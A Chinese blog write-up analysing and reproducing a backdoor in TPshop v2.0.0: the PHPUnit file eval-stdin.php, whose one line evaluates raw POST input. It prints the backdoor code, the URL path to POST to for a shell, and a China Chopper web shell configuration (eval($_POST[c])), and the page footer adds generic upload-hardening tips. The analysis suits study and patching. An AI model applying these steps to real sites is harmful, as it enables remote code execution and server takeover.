TPshop商城 Getshell后门文件分析与复现

本文作者:i春秋签约作家——Laimooc

官网地址:http://www.tp-shop.cn/

影响版本:TPSHOP v2.0.0

后门文件:eval-stdin.php 内容:

 

<?php  eval('?>' . file_get_contents('php://input')); ?>

分析:

使用

 

file_get_contents('php://input'))

接收POST请求的原始数据流

eval函数来执行。

我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:

1.jpg

利用方法:

访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。

2.jpg

那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.

采用写入的话就有点麻烦了。

地址:

http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

配置:

<O>
<?php eval($_POST[c]);?> </O>

3.jpg

4.jpg

转载于:https://www.cnblogs.com/ichunqiu/p/7832657.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
后台文件上传中的 GETshell 漏洞通常发生在服务器处理文件上传请求时,如果未正确验证上传文件类型、大小或内容,恶意用户可能会上传包含恶意脚本的文件,这些脚本可以在服务器上执行,从而获取系统的控制权(shell)。 解决这类漏洞的方法包括: 1. **验证上传内容**:确保上传文件类型限制在预期范围内,比如只允许上传图片、文档等特定类型的文件,而不是可执行文件或包含脚本的文件。 2. **文件名和路径限制**:对上传的文件名进行转义和过滤,避免使用特殊字符造成目录遍历或恶意路径执行。同时,上传文件应存储在安全的、不可执行的文件夹中。 3. **二进制模式检查**:使用二进制模式打开上传文件,而不是文本模式,防止脚本注入。 4. **文件扩展名验证**:即使文件名被修改,也要检查上传文件的实际类型,不依赖于文件名。 5. **文件内容检查**:使用安全的文件内容检测工具,扫描文件的内容以查找可能的恶意代码。 6. **启用安全配置**:启用服务器的文件权限管理,确保上传的文件只能被拥有者或授权用户访问,而不能执行。 7. **使用预定义上传目录**:避免使用相对或绝对路径,而是使用预定义的上传目录,减少潜在的路径遍历攻击。 8. **启用HTTP头限制**:设置合适的Content-Type限制,防止恶意构造的请求头引发漏洞。 9. **更新和补丁管理**:定期更新服务器软件和框架,修复已知的安全漏洞
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值